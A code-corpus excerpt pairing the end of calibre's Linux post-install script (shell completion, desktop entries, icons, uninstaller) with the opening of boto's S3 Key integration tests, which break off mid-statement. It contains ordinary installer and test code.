COMPREPLY=( $(compgen -W "dev:" "${cur}") )
return 0
fi
return 0
fi
;;
esac
}
complete -o nospace -F _ebook_device ebook-device
complete -o nospace -C %s ebook-convert
''')%complete)
zsh.write()
# }}}
class PostInstall:
def task_failed(self, msg):
self.warn(msg, 'with error:')
import traceback
tb = '\n\t'.join(traceback.format_exc().splitlines())
self.info('\t'+tb)
print
def warning(self, *args, **kwargs):
print '\n'+'_'*20, 'WARNING','_'*20
prints(*args, **kwargs)
print '_'*50
print ('\n')
self.warnings.append((args, kwargs))
sys.stdout.flush()
def __init__(self, opts, info=prints, warn=None, manifest=None):
self.opts = opts
self.info = info
self.warn = warn
self.warnings = []
if self.warn is None:
self.warn = self.warning
if not self.opts.staging_bindir:
self.opts.staging_bindir = os.path.join(self.opts.staging_root,
'bin')
if not self.opts.staging_sharedir:
self.opts.staging_sharedir = os.path.join(self.opts.staging_root,
'share', 'calibre')
self.opts.staging_etc = '/etc' if self.opts.staging_root == '/usr' else \
os.path.join(self.opts.staging_root, 'etc')
scripts = cPickle.loads(P('scripts.pickle', data=True))
self.manifest = manifest or []
if getattr(sys, 'frozen_path', False):
if os.access(self.opts.staging_bindir, os.W_OK):
self.info('Creating symlinks...')
for exe in scripts.keys():
dest = os.path.join(self.opts.staging_bindir, exe)
if os.path.lexists(dest):
os.unlink(dest)
tgt = os.path.join(getattr(sys, 'frozen_path'), exe)
self.info('\tSymlinking %s to %s'%(tgt, dest))
os.symlink(tgt, dest)
self.manifest.append(dest)
else:
self.warning(textwrap.fill(
'No permission to write to %s, not creating program launch symlinks,'
' you should ensure that %s is in your PATH or create the symlinks yourself' % (
self.opts.staging_bindir, getattr(sys, 'frozen_path', 'the calibre installation directory'))))
self.icon_resources = []
self.menu_resources = []
self.mime_resources = []
self.appdata_resources = []
if islinux or isbsd:
self.setup_completion()
if islinux or isbsd:
self.setup_desktop_integration()
self.create_uninstaller()
from calibre.utils.config import config_dir
if os.path.exists(config_dir):
os.chdir(config_dir)
if islinux or isbsd:
for f in os.listdir('.'):
if os.stat(f).st_uid == 0:
import shutil
shutil.rmtree(f) if os.path.isdir(f) else os.unlink(f)
if os.stat(config_dir).st_uid == 0:
os.rmdir(config_dir)
if warn is None and self.warnings:
self.info('\n\nThere were %d warnings\n'%len(self.warnings))
for args, kwargs in self.warnings:
self.info('*', *args, **kwargs)
print
def create_uninstaller(self):
base = self.opts.staging_bindir
if not os.access(base, os.W_OK) and getattr(sys, 'frozen_path', False):
base = sys.frozen_path
dest = os.path.join(base, 'calibre-uninstall')
self.info('Creating un-installer:', dest)
raw = UNINSTALL.format(
python='/usr/bin/python', euid=os.geteuid(),
manifest=self.manifest, icon_resources=self.icon_resources,
mime_resources=self.mime_resources, menu_resources=self.menu_resources,
appdata_resources=self.appdata_resources, frozen_path=getattr(sys, 'frozen_path', None))
try:
with open(dest, 'wb') as f:
f.write(raw)
os.chmod(dest, stat.S_IRWXU|stat.S_IRGRP|stat.S_IROTH)
if os.geteuid() == 0:
os.chown(dest, 0, 0)
except:
if self.opts.fatal_errors:
raise
self.task_failed('Creating uninstaller failed')
def setup_completion(self): # {{{
try:
self.info('Setting up command-line completion...')
zsh = ZshCompleter(self.opts)
if zsh.dest:
self.info('Installing zsh completion to:', zsh.dest)
self.manifest.append(zsh.dest)
bash_comp_dest = get_bash_completion_path(self.opts.staging_root, os.path.dirname(self.opts.staging_sharedir), self.info)
if bash_comp_dest is not None:
self.info('Installing bash completion to:', bash_comp_dest)
self.manifest.append(bash_comp_dest)
write_completion(bash_comp_dest, zsh)
except TypeError as err:
if 'resolve_entities' in str(err):
print 'You need python-lxml >= 2.0.5 for calibre'
sys.exit(1)
raise
except EnvironmentError as e:
if e.errno == errno.EACCES:
self.warning('Failed to setup completion, permission denied')
if self.opts.fatal_errors:
raise
self.task_failed('Setting up completion failed')
except:
if self.opts.fatal_errors:
raise
self.task_failed('Setting up completion failed')
# }}}
def setup_desktop_integration(self): # {{{
try:
self.info('Setting up desktop integration...')
env = os.environ.copy()
cc = check_call
if getattr(sys, 'frozen_path', False) and 'LD_LIBRARY_PATH' in env:
paths = env.get('LD_LIBRARY_PATH', '').split(os.pathsep)
paths = [x for x in paths if x]
npaths = [x for x in paths if x != sys.frozen_path+'/lib']
env['LD_LIBRARY_PATH'] = os.pathsep.join(npaths)
cc = partial(check_call, env=env)
with TemporaryDirectory() as tdir, CurrentDir(tdir), \
PreserveMIMEDefaults():
render_img('mimetypes/lrf.png', 'calibre-lrf.png')
cc('xdg-icon-resource install --noupdate --context mimetypes --size 128 calibre-lrf.png application-lrf', shell=True)
self.icon_resources.append(('mimetypes', 'application-lrf', '128'))
cc('xdg-icon-resource install --noupdate --context mimetypes --size 128 calibre-lrf.png text-lrs', shell=True)
self.icon_resources.append(('mimetypes', 'application-lrs',
'128'))
render_img('mimetypes/mobi.png', 'calibre-mobi.png')
cc('xdg-icon-resource install --noupdate --context mimetypes --size 128 calibre-mobi.png application-x-mobipocket-ebook', shell=True)
self.icon_resources.append(('mimetypes', 'application-x-mobipocket-ebook', '128'))
render_img('mimetypes/tpz.png', 'calibre-tpz.png')
cc('xdg-icon-resource install --noupdate --context mimetypes --size 128 calibre-tpz.png application-x-topaz-ebook', shell=True)
self.icon_resources.append(('mimetypes', 'application-x-topaz-ebook', '128'))
render_img('mimetypes/azw2.png', 'calibre-azw2.png')
cc('xdg-icon-resource install --noupdate --context mimetypes --size 128 calibre-azw2.png application-x-kindle-application', shell=True)
self.icon_resources.append(('mimetypes', 'application-x-kindle-application', '128'))
render_img('mimetypes/azw3.png', 'calibre-azw3.png')
cc('xdg-icon-resource install --noupdate --context mimetypes --size 128 calibre-azw3.png application-x-mobi8-ebook', shell=True)
self.icon_resources.append(('mimetypes', 'application-x-mobi8-ebook', '128'))
render_img('lt.png', 'calibre-gui.png', width=256, height=256)
cc('xdg-icon-resource install --noupdate --size 256 calibre-gui.png calibre-gui', shell=True)
self.icon_resources.append(('apps', 'calibre-gui', '256'))
render_img('viewer.png', 'calibre-viewer.png', width=256, height=256)
cc('xdg-icon-resource install --size 256 calibre-viewer.png calibre-viewer', shell=True)
self.icon_resources.append(('apps', 'calibre-viewer', '256'))
render_img('tweak.png', 'calibre-ebook-edit.png', width=256, height=256)
cc('xdg-icon-resource install --size 256 calibre-ebook-edit.png calibre-ebook-edit', shell=True)
self.icon_resources.append(('apps', 'calibre-ebook-edit', '256'))
mimetypes = set()
for x in all_input_formats():
mt = guess_type('dummy.'+x)[0]
if mt and 'chemical' not in mt and 'ctc-posml' not in mt:
mimetypes.add(mt)
mimetypes.discard('application/octet-stream')
def write_mimetypes(f):
f.write('MimeType=%s;\n'%';'.join(mimetypes))
from calibre.ebooks.oeb.polish.main import SUPPORTED
from calibre.ebooks.oeb.polish.import_book import IMPORTABLE
f = open('calibre-lrfviewer.desktop', 'wb')
f.write(VIEWER)
f.close()
f = open('calibre-ebook-viewer.desktop', 'wb')
f.write(EVIEWER)
write_mimetypes(f)
f = open('calibre-ebook-edit.desktop', 'wb')
f.write(ETWEAK)
mt = {guess_type('a.' + x.lower())[0] for x in (SUPPORTED|IMPORTABLE)} - {None, 'application/octet-stream'}
f.write('MimeType=%s;\n'%';'.join(mt))
f.close()
f = open('calibre-gui.desktop', 'wb')
f.write(GUI)
write_mimetypes(f)
f.close()
des = ('calibre-gui.desktop', 'calibre-lrfviewer.desktop',
'calibre-ebook-viewer.desktop', 'calibre-ebook-edit.desktop')
appdata = os.path.join(os.path.dirname(self.opts.staging_sharedir), 'appdata')
if not os.path.exists(appdata):
try:
os.mkdir(appdata)
except:
self.warning('Failed to create %s not installing appdata files' % appdata)
if os.path.exists(appdata) and not os.access(appdata, os.W_OK):
self.warning('Do not have write permissions for %s not installing appdata files' % appdata)
else:
from calibre.utils.localization import get_all_translators
translators = dict(get_all_translators())
APPDATA = get_appdata()
for x in des:
cmd = ['xdg-desktop-menu', 'install', '--noupdate', './'+x]
cc(' '.join(cmd), shell=True)
self.menu_resources.append(x)
ak = x.partition('.')[0]
if ak in APPDATA and os.access(appdata, os.W_OK):
self.appdata_resources.append(write_appdata(ak, APPDATA[ak], appdata, translators))
cc(['xdg-desktop-menu', 'forceupdate'])
MIME = P('calibre-mimetypes.xml')
self.mime_resources.append(MIME)
cc(['xdg-mime', 'install', MIME])
except Exception:
if self.opts.fatal_errors:
raise
self.task_failed('Setting up desktop integration failed')
# }}}
def option_parser():
from calibre.utils.config import OptionParser
parser = OptionParser()
parser.add_option('--make-errors-fatal', action='store_true', default=False,
dest='fatal_errors', help='If set die on errors.')
parser.add_option('--root', dest='staging_root', default='/usr',
help='Prefix under which to install files')
parser.add_option('--bindir', default=None, dest='staging_bindir',
help='Location where calibre launcher scripts were installed. Typically /usr/bin')
parser.add_option('--sharedir', default=None, dest='staging_sharedir',
help='Location where calibre resources were installed, typically /usr/share/calibre')
return parser
def options(option_parser):
parser = option_parser()
options = parser.option_list
for group in parser.option_groups:
options += group.option_list
opts = []
for opt in options:
opts.extend(opt._short_opts)
opts.extend(opt._long_opts)
return opts
def opts_and_words(name, op, words, takes_files=False):
opts = '|'.join(options(op))
words = '|'.join([w.replace("'", "\\'") for w in words])
fname = name.replace('-', '_')
return ('_'+fname+'()'+
'''
{
local cur opts
local IFS=$'|\\t'
COMPREPLY=()
cur="${COMP_WORDS[COMP_CWORD]}"
opts="%s"
words="%s"
case "${cur}" in
-* )
COMPREPLY=( $(compgen -W "${opts}" -- ${cur}) )
COMPREPLY=( $( echo ${COMPREPLY[@]} | sed 's/ /\\\\ /g' | tr '\\n' '\\t' ) )
return 0
;;
* )
COMPREPLY=( $(compgen -W "${words}" -- ${cur}) )
COMPREPLY=( $( echo ${COMPREPLY[@]} | sed 's/ /\\\\ /g' | tr '\\n' '\\t' ) )
return 0
;;
esac
}
complete -F _'''%(opts, words) + fname + ' ' + name +"\n\n").encode('utf-8')
pics = {'jpg', 'jpeg', 'gif', 'png', 'bmp'}
def opts_and_exts(name, op, exts, cover_opts=('--cover',), opf_opts=(),
file_map={}):
opts = ' '.join(options(op))
exts.extend([i.upper() for i in exts])
exts='|'.join(exts)
fname = name.replace('-', '_')
spics = '|'.join(tuple(pics) + tuple(x.upper() for x in pics))
special_exts_template = '''\
%s )
_filedir %s
return 0
;;
'''
extras = []
for eopts, eexts in ((cover_opts, "${pics}"), (opf_opts, "'@(opf)'")):
for opt in eopts:
extras.append(special_exts_template%(opt, eexts))
extras = '\n'.join(extras)
return '_'+fname+'()'+\
'''
{
local cur prev opts
COMPREPLY=()
cur="${COMP_WORDS[COMP_CWORD]}"
prev="${COMP_WORDS[COMP_CWORD-1]}"
opts="%(opts)s"
pics="@(%(pics)s)"
case "${prev}" in
%(extras)s
esac
case "${cur}" in
%(extras)s
-* )
COMPREPLY=( $(compgen -W "${opts}" -- ${cur}) )
return 0
;;
* )
_filedir '@(%(exts)s)'
return 0
;;
esac
}
complete -o filenames -F _'''%dict(pics=spics,
opts=opts, extras=extras, exts=exts) + fname + ' ' + name +"\n\n"
VIEWER = '''\
[Desktop Entry]
Version=1.0
Type=Application
Name=LRF Viewer
GenericName=Viewer for LRF files
Comment=Viewer for LRF files (SONY ebook format files)
TryExec=lrfviewer
Exec=lrfviewer %f
Icon=calibre-viewer
MimeType=application/x-sony-bbeb;
Categories=Graphics;Viewer;
'''
EVIEWER = '''\
[Desktop Entry]
Version=1.0
Type=Application
Name=E-book Viewer
GenericName=Viewer for E-books
Comment=Viewer for E-books in all the major formats
TryExec=ebook-viewer
Exec=ebook-viewer --detach %f
Icon=calibre-viewer
Categories=Graphics;Viewer;
'''
ETWEAK = '''\
[Desktop Entry]
Version=1.0
Type=Application
Name=Edit E-book
GenericName=Edit E-books
Comment=Edit e-books in various formats
TryExec=ebook-edit
Exec=ebook-edit --detach %f
Icon=calibre-ebook-edit
Categories=Office;
'''
GUI = '''\
[Desktop Entry]
Version=1.0
Type=Application
Name=calibre
GenericName=E-book library management
Comment=E-book library management: Convert, view, share, catalogue all your e-books
TryExec=calibre
Exec=calibre --detach %F
Icon=calibre-gui
Categories=Office;
'''
def get_appdata():
_ = lambda x: x # Make sure the text below is not translated, but is marked for translation
return {
'calibre-gui': {
'description':(
_('calibre is the one stop solution to all your e-book needs.'),
_('You can use calibre to catalog your books, fetch metadata for them automatically, convert them from and to all the various ebook formats, send them to your e-book reader devices, read the books on your computer, edit the books in a dedicated e-book editor and even make them available over the network with the built-in content server. You can also download news and periodicals in e-book format from over a thousand different news and magazine websites.') # noqa
),
'screenshots':(
(1408, 792, 'https://lh4.googleusercontent.com/-bNE1hc_3pIc/UvHLwKPGBPI/AAAAAAAAASA/8oavs_c6xoU/w1408-h792-no/main-default.png',),
(1408, 792, 'https://lh4.googleusercontent.com/-Zu2httSKABE/UvHMYK30JJI/AAAAAAAAATg/dQTQUjBvV5s/w1408-h792-no/main-grid.png'),
(1408, 792, 'https://lh3.googleusercontent.com/-_trYUjU_BaY/UvHMYSdKhlI/AAAAAAAAATc/auPA3gyXc6o/w1408-h792-no/main-flow.png'),
),
},
'calibre-ebook-edit': {
'description':(
_('The calibre e-book editor allows you to edit the text and styles inside the book with a live preview of your changes.'),
_('It can edit books in both the EPUB and AZW3 (kindle) formats. It includes various useful tools for checking the book for errors, editing the Table of Contents, performing automated cleanups, etc.'), # noqa
),
'screenshots':(
(1408, 792, 'https://lh5.googleusercontent.com/-M2MAVc3A8e4/UvHMWqGRa8I/AAAAAAAAATA/cecQeWUYBVs/w1408-h792-no/edit-default.png',),
(1408, 792, 'https://lh4.googleusercontent.com/-WhoMxuRb34c/UvHMWqN8aGI/AAAAAAAAATI/8SDBYWXb7-8/w1408-h792-no/edit-check.png'),
(887, 575, 'https://lh6.googleusercontent.com/-KwaOwHabnBs/UvHMWidjyXI/AAAAAAAAAS8/H6xmCeLnSpk/w887-h575-no/edit-toc.png'),
),
},
'calibre-ebook-viewer': {
'description': (
_('The calibre e-book viewer allows you to read e-books in over a dozen different formats.'),
_('It has a full screen mode for distraction free reading and can display the text with multiple columns per screen.'),
),
'screenshots':(
(1408, 792, 'https://lh5.googleusercontent.com/-dzSO82BPpaE/UvHMYY5SpNI/AAAAAAAAATk/I_kF9fYWrZM/w1408-h792-no/viewer-default.png',),
(1920, 1080, 'https://lh6.googleusercontent.com/-n32Ae5RytAk/UvHMY0QD94I/AAAAAAAAATs/Zw8Yz08HIKk/w1920-h1080-no/viewer-fs.png'),
),
},
}
def write_appdata(key, entry, base, translators):
from lxml.etree import tostring
from lxml.builder import E
fpath = os.path.join(base, '%s.appdata.xml' % key)
root = E.application(
E.id(key + '.desktop', type='desktop'),
E.licence('CC0'),
E.description(),
E.url('http://calibre-ebook.com', type='homepage'),
E.screenshots(),
)
for w, h, url in entry['screenshots']:
s = E.screenshot(url, width=str(w), height=str(h))
root[-1].append(s)
root[-1][0].set('type', 'default')
for para in entry['description']:
root[2].append(E.p(para))
for lang, t in translators.iteritems():
tp = t.ugettext(para)
if tp != para:
root[2].append(E.p(tp))
root[2][-1].set('{http://www.w3.org/XML/1998/namespace}lang', lang)
with open(fpath, 'wb') as f:
f.write(tostring(root, encoding='utf-8', xml_declaration=True, pretty_print=True))
return fpath
def render_img(image, dest, width=128, height=128):
from PyQt5.Qt import QImage, Qt
img = QImage(I(image)).scaled(width, height, Qt.IgnoreAspectRatio, Qt.SmoothTransformation)
img.save(dest)
def main():
p = option_parser()
opts, args = p.parse_args()
PostInstall(opts)
return 0
def cli_index_strings():
return _('Command Line Interface'), _(
'On OS X, the command line tools are inside the calibre bundle, for example,'
' if you installed calibre in :file:`/Applications` the command line tools'
' are in :file:`/Applications/calibre.app/Contents/console.app/Contents/MacOS/`.'), _(
'Documented Commands'), _('Undocumented Commands'), _(
'You can see usage for undocumented commands by executing them without arguments in a terminal.'), _(
'Change Language')
if __name__ == '__main__':
sys.exit(main())
| gpl-3.0 |
clouddocx/boto | tests/integration/s3/test_key.py | 75 | 20790 | # -*- coding: utf-8 -*-
# Copyright (c) 2012 Mitch Garnaat http://garnaat.org/
# All rights reserved.
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish, dis-
# tribute, sublicense, and/or sell copies of the Software, and to permit
# persons to whom the Software is furnished to do so, subject to the fol-
# lowing conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
# OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABIL-
# ITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT
# SHALL THE AUTHOR BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS
# IN THE SOFTWARE.
"""
Some unit tests for S3 Key
"""
from tests.unit import unittest
import time
import boto.s3
from boto.compat import six, StringIO, urllib
from boto.s3.connection import S3Connection
from boto.s3.key import Key
from boto.exception import S3ResponseError
class S3KeyTest(unittest.TestCase):
s3 = True
def setUp(self):
self.conn = S3Connection()
self.bucket_name = 'keytest-%d' % int(time.time())
self.bucket = self.conn.create_bucket(self.bucket_name)
def tearDown(self):
for key in self.bucket:
key.delete()
self.bucket.delete()
def test_set_contents_from_file_dataloss(self):
# Create an empty stringio and write to it.
content = "abcde"
sfp = StringIO()
sfp.write(content)
# Try set_contents_from_file() without rewinding sfp
k = self.bucket.new_key("k")
try:
k.set_contents_from_file(sfp)
self.fail("forgot to rewind so should fail.")
except AttributeError:
pass
# call with rewind and check if we wrote 5 bytes
k.set_contents_from_file(sfp, rewind=True)
self.assertEqual(k.size, 5)
# check actual contents by getting it.
kn = self.bucket.new_key("k")
ks = kn.get_contents_as_string().decode('utf-8')
self.assertEqual(ks, content)
# finally, try with a 0 length string
sfp = StringIO()
k = self.bucket.new_key("k")
k.set_contents_from_file(sfp)
self.assertEqual(k.size, 0)
# check actual contents by getting it.
kn = self.bucket.new_key("k")
ks = kn.get_contents_as_string().decode('utf-8')
self.assertEqual(ks, "")
def test_set_contents_as_file(self):
content="01234567890123456789"
sfp = StringIO(content)
# fp is set at 0 for just opened (for read) files.
# set_contents should write full content to key.
k = self.bucket.new_key("k")
k.set_contents_from_file(sfp)
self.assertEqual(k.size, 20)
kn = self.bucket.new_key("k")
ks = kn.get_contents_as_string().decode('utf-8')
self.assertEqual(ks, content)
# set fp to 5 and set contents. this should
# set "567890123456789" to the key
sfp.seek(5)
k = self.bucket.new_key("k")
k.set_contents_from_file(sfp)
self.assertEqual(k.size, 15)
kn = self.bucket.new_key("k")
ks = kn.get_contents_as_string().decode('utf-8')
self.assertEqual(ks, content[5:])
# set fp to 5 and only set 5 bytes. this should
# write the value "56789" to the key.
sfp.seek(5)
k = self.bucket.new_key("k")
k.set_contents_from_file(sfp, size=5)
self.assertEqual(k.size, 5)
self.assertEqual(sfp.tell(), 10)
kn = self.bucket.new_key("k")
ks = kn.get_contents_as_string().decode('utf-8')
self.assertEqual(ks, content[5:10])
def test_set_contents_with_md5(self):
content="01234567890123456789"
sfp = StringIO(content)
# fp is set at 0 for just opened (for read) files.
# set_contents should write full content to key.
k = self.bucket.new_key("k")
good_md5 = k.compute_md5(sfp)
k.set_contents_from_file(sfp, md5=good_md5)
kn = self.bucket.new_key("k")
ks = kn.get_contents_as_string().decode('utf-8')
self.assertEqual(ks, content)
# set fp to 5 and only set 5 bytes. this should
# write the value "56789" to the key.
sfp.seek(5)
k = self.bucket.new_key("k")
good_md5 = k.compute_md5(sfp, size=5)
k.set_contents_from_file(sfp, size=5, md5=good_md5)
self.assertEqual(sfp.tell(), 10)
kn = self.bucket.new_key("k")
ks = kn.get_contents_as_string().decode('utf-8')
self.assertEqual(ks, content[5:10])
# let's try a wrong md5 by just altering it.
k = self.bucket.new_key("k")
sfp.seek(0)
hexdig, base64 = k.compute_md5(sfp)
bad_md5 = (hexdig, base64[3:])
try:
k.set_contents_from_file(sfp, md5=bad_md5)
self.fail("should fail with bad md5")
except S3ResponseError:
pass
def test_get_contents_with_md5(self):
content="01234567890123456789"
sfp = StringIO(content)
k = self.bucket.new_key("k")
k.set_contents_from_file(sfp)
kn = self.bucket.new_key("k")
s = kn.get_contents_as_string().decode('utf-8')
self.assertEqual(kn.md5, k.md5)
self.assertEqual(s, content)
def test_file_callback(self):
def callback(wrote, total):
self.my_cb_cnt += 1
self.assertNotEqual(wrote, self.my_cb_last, "called twice with same value")
self.my_cb_last = wrote
# Zero bytes written => 1 call
self.my_cb_cnt = 0
self.my_cb_last = None
k = self.bucket.new_key("k")
k.BufferSize = 2
sfp = StringIO("")
k.set_contents_from_file(sfp, cb=callback, num_cb=10)
self.assertEqual(self.my_cb_cnt, 1)
self.assertEqual(self.my_cb_last, 0)
sfp.close()
# Read back zero bytes => 1 call
self.my_cb_cnt = 0
self.my_cb_last = None
s = k.get_contents_as_string(cb=callback)
self.assertEqual(self.my_cb_cnt, 1)
self.assertEqual(self.my_cb_last, 0)
content="01234567890123456789"
sfp = StringIO(content)
# expect 2 calls due start/finish
self.my_cb_cnt = 0
self.my_cb_last = None
k = self.bucket.new_key("k")
k.set_contents_from_file(sfp, cb=callback, num_cb=10)
self.assertEqual(self.my_cb_cnt, 2)
self.assertEqual(self.my_cb_last, 20)
# Read back all bytes => 2 calls
self.my_cb_cnt = 0
self.my_cb_last = None
s = k.get_contents_as_string(cb=callback).decode('utf-8')
self.assertEqual(self.my_cb_cnt, 2)
self.assertEqual(self.my_cb_last, 20)
self.assertEqual(s, content)
# rewind sfp and try upload again. -1 should call
# for every read/write so that should make 11 when bs=2
sfp.seek(0)
self.my_cb_cnt = 0
self.my_cb_last = None
k = self.bucket.new_key("k")
k.BufferSize = 2
k.set_contents_from_file(sfp, cb=callback, num_cb=-1)
self.assertEqual(self.my_cb_cnt, 11)
self.assertEqual(self.my_cb_last, 20)
# Read back all bytes => 11 calls
self.my_cb_cnt = 0
self.my_cb_last = None
s = k.get_contents_as_string(cb=callback, num_cb=-1).decode('utf-8')
self.assertEqual(self.my_cb_cnt, 11)
self.assertEqual(self.my_cb_last, 20)
self.assertEqual(s, content)
# no more than 1 times => 2 times
# last time always 20 bytes
sfp.seek(0)
self.my_cb_cnt = 0
self.my_cb_last = None
k = self.bucket.new_key("k")
k.BufferSize = 2
k.set_contents_from_file(sfp, cb=callback, num_cb=1)
self.assertTrue(self.my_cb_cnt <= 2)
self.assertEqual(self.my_cb_last, 20)
# no more than 1 times => 2 times
self.my_cb_cnt = 0
self.my_cb_last = None
s = k.get_contents_as_string(cb=callback, num_cb=1).decode('utf-8')
self.assertTrue(self.my_cb_cnt <= 2)
self.assertEqual(self.my_cb_last, 20)
self.assertEqual(s, content)
# no more than 2 times
# last time always 20 bytes
sfp.seek(0)
self.my_cb_cnt = 0
self.my_cb_last = None
k = self.bucket.new_key("k")
k.BufferSize = 2
k.set_contents_from_file(sfp, cb=callback, num_cb=2)
self.assertTrue(self.my_cb_cnt <= 2)
self.assertEqual(self.my_cb_last, 20)
# no more than 2 times
self.my_cb_cnt = 0
self.my_cb_last = None
s = k.get_contents_as_string(cb=callback, num_cb=2).decode('utf-8')
self.assertTrue(self.my_cb_cnt <= 2)
self.assertEqual(self.my_cb_last, 20)
self.assertEqual(s, content)
# no more than 3 times
# last time always 20 bytes
sfp.seek(0)
self.my_cb_cnt = 0
self.my_cb_last = None
k = self.bucket.new_key("k")
k.BufferSize = 2
k.set_contents_from_file(sfp, cb=callback, num_cb=3)
self.assertTrue(self.my_cb_cnt <= 3)
self.assertEqual(self.my_cb_last, 20)
# no more than 3 times
self.my_cb_cnt = 0
self.my_cb_last = None
s = k.get_contents_as_string(cb=callback, num_cb=3).decode('utf-8')
self.assertTrue(self.my_cb_cnt <= 3)
self.assertEqual(self.my_cb_last, 20)
self.assertEqual(s, content)
# no more than 4 times
# last time always 20 bytes
sfp.seek(0)
self.my_cb_cnt = 0
self.my_cb_last = None
k = self.bucket.new_key("k")
k.BufferSize = 2
k.set_contents_from_file(sfp, cb=callback, num_cb=4)
self.assertTrue(self.my_cb_cnt <= 4)
self.assertEqual(self.my_cb_last, 20)
# no more than 4 times
self.my_cb_cnt = 0
self.my_cb_last = None
s = k.get_contents_as_string(cb=callback, num_cb=4).decode('utf-8')
self.assertTrue(self.my_cb_cnt <= 4)
self.assertEqual(self.my_cb_last, 20)
self.assertEqual(s, content)
# no more than 6 times
# last time always 20 bytes
sfp.seek(0)
self.my_cb_cnt = 0
self.my_cb_last = None
k = self.bucket.new_key("k")
k.BufferSize = 2
k.set_contents_from_file(sfp, cb=callback, num_cb=6)
self.assertTrue(self.my_cb_cnt <= 6)
self.assertEqual(self.my_cb_last, 20)
# no more than 6 times
self.my_cb_cnt = 0
self.my_cb_last = None
s = k.get_contents_as_string(cb=callback, num_cb=6).decode('utf-8')
self.assertTrue(self.my_cb_cnt <= 6)
self.assertEqual(self.my_cb_last, 20)
self.assertEqual(s, content)
# no more than 10 times
# last time always 20 bytes
sfp.seek(0)
self.my_cb_cnt = 0
self.my_cb_last = None
k = self.bucket.new_key("k")
k.BufferSize = 2
k.set_contents_from_file(sfp, cb=callback, num_cb=10)
self.assertTrue(self.my_cb_cnt <= 10)
self.assertEqual(self.my_cb_last, 20)
# no more than 10 times
self.my_cb_cnt = 0
self.my_cb_last = None
s = k.get_contents_as_string(cb=callback, num_cb=10).decode('utf-8')
self.assertTrue(self.my_cb_cnt <= 10)
self.assertEqual(self.my_cb_last, 20)
self.assertEqual(s, content)
# no more than 1000 times
# last time always 20 bytes
sfp.seek(0)
self.my_cb_cnt = 0
self.my_cb_last = None
k = self.bucket.new_key("k")
k.BufferSize = 2
k.set_contents_from_file(sfp, cb=callback, num_cb=1000)
self.assertTrue(self.my_cb_cnt <= 1000)
self.assertEqual(self.my_cb_last, 20)
# no more than 1000 times
self.my_cb_cnt = 0
self.my_cb_last = None
s = k.get_contents_as_string(cb=callback, num_cb=1000).decode('utf-8')
self.assertTrue(self.my_cb_cnt <= 1000)
self.assertEqual(self.my_cb_last, 20)
self.assertEqual(s, content)
def test_website_redirects(self):
self.bucket.configure_website('index.html')
key = self.bucket.new_key('redirect-key')
self.assertTrue(key.set_redirect('http://www.amazon.com/'))
self.assertEqual(key.get_redirect(), 'http://www.amazon.com/')
self.assertTrue(key.set_redirect('http://aws.amazon.com/'))
self.assertEqual(key.get_redirect(), 'http://aws.amazon.com/')
def test_website_redirect_none_configured(self):
key = self.bucket.new_key('redirect-key')
key.set_contents_from_string('')
self.assertEqual(key.get_redirect(), None)
def test_website_redirect_with_bad_value(self):
self.bucket.configure_website('index.html')
key = self.bucket.new_key('redirect-key')
with self.assertRaises(key.provider.storage_response_error):
# Must start with a / or http
key.set_redirect('ftp://ftp.example.org')
with self.assertRaises(key.provider.storage_response_error):
# Must start with a / or http
key.set_redirect('')
def test_setting_date(self):
key = self.bucket.new_key('test_date')
# This should actually set x-amz-meta-date & not fail miserably.
key.set_metadata('date', '20130524T155935Z')
key.set_contents_from_string('Some text here.')
check = self.bucket.get_key('test_date')
self.assertEqual(check.get_metadata('date'), u'20130524T155935Z')
self.assertTrue('x-amz-meta-date' in check._get_remote_metadata())
def test_header_casing(self):
key = self.bucket.new_key('test_header_case')
# Using anything but CamelCase on ``Content-Type`` or ``Content-MD5``
# used to cause a signature error (when using ``s3`` for signing).
key.set_metadata('Content-type', 'application/json')
key.set_metadata('Content-md5', 'XmUKnus7svY1frWsVskxXg==')
key.set_contents_from_string('{"abc": 123}')
check = self.bucket.get_key('test_header_case')
self.assertEqual(check.content_type, 'application/json')
def test_header_encoding(self):
key = self.bucket.new_key('test_header_encoding')
key.set_metadata('Cache-control', u'public, max-age=500')
key.set_metadata('Test-Plus', u'A plus (+)')
key.set_metadata('Content-disposition', u'filename=Schöne Zeit.txt')
key.set_metadata('Content-Encoding', 'gzip')
key.set_metadata('Content-Language', 'de')
key.set_metadata('Content-Type', 'application/pdf')
self.assertEqual(key.content_type, 'application/pdf')
key.set_metadata('X-Robots-Tag', 'all')
key.set_metadata('Expires', u'Thu, 01 Dec 1994 16:00:00 GMT')
key.set_contents_from_string('foo')
check = self.bucket.get_key('test_header_encoding')
remote_metadata = check._get_remote_metadata()
# TODO: investigate whether encoding ' ' as '%20' makes sense
self.assertEqual(check.cache_control, 'public,%20max-age=500')
self.assertEqual(remote_metadata['cache-control'], 'public,%20max-age=500')
self.assertEqual(check.get_metadata('test-plus'), 'A plus (+)')
self.assertEqual(check.content_disposition, 'filename=Sch%C3%B6ne%20Zeit.txt')
self.assertEqual(remote_metadata['content-disposition'], 'filename=Sch%C3%B6ne%20Zeit.txt')
self.assertEqual(check.content_encoding, 'gzip')
self.assertEqual(remote_metadata['content-encoding'], 'gzip')
self.assertEqual(check.content_language, 'de')
self.assertEqual(remote_metadata['content-language'], 'de')
self.assertEqual(check.content_type, 'application/pdf')
self.assertEqual(remote_metadata['content-type'], 'application/pdf')
self.assertEqual(check.x_robots_tag, 'all')
self.assertEqual(remote_metadata['x-robots-tag'], 'all')
self.assertEqual(check.expires, 'Thu,%2001%20Dec%201994%2016:00:00%20GMT')
self.assertEqual(remote_metadata['expires'], 'Thu,%2001%20Dec%201994%2016:00:00%20GMT')
expected = u'filename=Schöne Zeit.txt'
if six.PY2:
# Newer versions of python default to unicode strings, but python 2
# requires encoding to UTF-8 to compare the two properly
expected = expected.encode('utf-8')
self.assertEqual(
